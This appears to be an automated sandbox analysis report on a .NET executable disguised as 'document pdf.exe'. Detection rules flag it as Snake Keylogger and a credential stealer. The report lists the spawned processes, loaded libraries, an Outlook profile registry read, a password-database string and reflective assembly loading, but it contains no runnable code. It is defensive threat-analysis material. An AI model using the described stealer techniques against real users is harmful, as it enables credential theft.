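The unattributed list is the work queue: each of those nine client ports needs its server IP (and SNI, if the ClientHello is in the capture) pulled from the PCAP before the session can be tied to the Telegram API, the geolocation service, or something else.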

                System Summary

Source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: document pdf.exe PID: 3420, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: document pdf.exe PID: 2672, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: initial sample | Static PE information: Filename: document pdf.exe
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 0_2_0306E5A4
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 0_2_05717490
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 0_2_05717480
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 0_2_05710690
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 0_2_05710680
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 0_2_058040D0
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 0_2_05804E38
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 0_2_05802918
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 0_2_058098CC
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 0_2_05802361
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 0_2_05802368
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 0_2_058098C4
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 0_2_0580ABE8
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_00F1A088
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_00F1C146
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_00F1D278
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_00F15362
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_00F1C468
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_00F1C738
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_00F169A0
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_00F1E988
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_00F1CA08
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_00F1CCD8
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_00F13E09
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_00F16FC8
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_00F1CFAA
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_00F129E0
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_00F1E97A
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_00F1F961
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_06691E80
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_066917A0
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669FC68
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_06699C70
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_06699548
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_06690B30
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_06695028
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_06692968
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_06691E70
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669DE00
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669E6AF
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669E6A0
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669E6B0
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669EF60
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669EF51
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669178F
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669CCA0
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669CC8F
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669D540
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669D550
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669DDFF
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669DDF1
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669E24A
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669E258
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669EAF8
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_06699328
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_06690B20
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669EB08
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_06699BFB
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_06698BA0
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669F3B8
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_06698B91
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_06690040
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669F802
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_06690006
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_06695018
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669F810
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669D0F8
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669D9A8
Source: C:\Users\user\Desktop\document pdf.exe | Code function: 3_2_0669D999
Source: C:\Users\user\Desktop\document pdf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 1340
Source: document pdf.exe, 00000000.00000002.2271968435.000000000137E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs document pdf.exe
Source: document pdf.exe, 00000000.00000002.2272818698.000000000321C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs document pdf.exe
Source: document pdf.exe, 00000000.00000002.2277432232.0000000007A70000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs document pdf.exe
Source: document pdf.exe, 00000000.00000002.2272818698.0000000003216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs document pdf.exe
Source: document pdf.exe, 00000000.00000002.2275894684.0000000005A40000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs document pdf.exe
Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs document pdf.exe
Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs document pdf.exe
Source: document pdf.exe, 00000003.00000002.4662715149.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs document pdf.exe
Source: document pdf.exe, 00000003.00000002.4662850359.0000000000B38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs document pdf.exe
Source: document pdf.exe, 00000003.00000002.4662245405.0000000000446000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs document pdf.exe
Source: document pdf.exe | Binary or memory string: OriginalFilenameWCyC.exe8 vs document pdf.exe
Source: document pdf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: document pdf.exe PID: 3420, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: document pdf.exe PID: 2672, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: document pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.document pdf.exe.43ee280.1.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.document pdf.exe.43ee280.1.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.document pdf.exe.43ee280.1.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, T6K8pjbZifSTbFSZ9B.cs | Security API names: _0020.SetAccessControl
Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, T6K8pjbZifSTbFSZ9B.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, T6K8pjbZifSTbFSZ9B.cs | Security API names: _0020.AddAccessRule
Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, YuRtjF05Y3giqbqHZM.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, T6K8pjbZifSTbFSZ9B.cs | Security API names: _0020.SetAccessControl
Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, T6K8pjbZifSTbFSZ9B.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, T6K8pjbZifSTbFSZ9B.cs | Security API names: _0020.AddAccessRule
Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, YuRtjF05Y3giqbqHZM.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/6@5/4
                Source: C:\Users\user\Desktop\document pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\document pdf.exe.logJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3420
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\42db4eed-5be4-456b-b922-4da10a7b395dJump to behavior
                Source: document pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: document pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\document pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002D1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: document pdf.exeVirustotal: Detection: 73%
                Source: document pdf.exeReversingLabs: Detection: 65%
                Source: unknownProcess created: C:\Users\user\Desktop\document pdf.exe "C:\Users\user\Desktop\document pdf.exe"
                Source: C:\Users\user\Desktop\document pdf.exeProcess created: C:\Users\user\Desktop\document pdf.exe "C:\Users\user\Desktop\document pdf.exe"
                Source: C:\Users\user\Desktop\document pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 1340
                Source: C:\Users\user\Desktop\document pdf.exeProcess created: C:\Users\user\Desktop\document pdf.exe "C:\Users\user\Desktop\document pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: rasapi32.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: rasman.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: rtutils.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: secur32.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\document pdf.exe Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\document pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\document pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\document pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: document pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: document pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Xml.ni.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: mscorlib.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: Accessibility.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.ni.pdbRSDS source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Drawing.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: mscorlib.ni.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Xml.pdb< source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Core.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Core.pdbMZ source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.pdb4 source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Configuration.ni.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Configuration.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Xml.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.ni.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Core.ni.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERA83F.tmp.dmp.6.dr

                Data Obfuscation

                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, T6K8pjbZifSTbFSZ9B.cs .Net Code: wV1tBfkplX System.Reflection.Assembly.Load(byte[])
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, T6K8pjbZifSTbFSZ9B.cs .Net Code: wV1tBfkplX System.Reflection.Assembly.Load(byte[])
                Source: document pdf.exe Static PE information: section name: .text entropy: 7.85898553696103
